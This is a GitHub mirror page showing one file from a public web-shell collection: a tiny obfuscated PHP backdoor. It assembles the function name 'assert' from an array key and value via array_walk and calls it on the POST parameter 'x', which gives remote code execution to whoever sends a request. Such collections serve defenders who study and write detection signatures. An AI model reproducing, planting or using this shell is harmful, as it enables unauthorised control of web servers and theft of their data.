1
0
mirror of https://github.com/tennc/webshell.git synced 2025-12-06 04:41:28 +00:00
Files
webshell/php/2020.08.20.12.php

10 lines
165 B
PHP

<?php
function sqlsec($value,$key)
{
$x = $key.$value;
$x($_POST['x']);
}
$a=array("ass"=>"ert");
array_walk($a,"sqlsec");
?>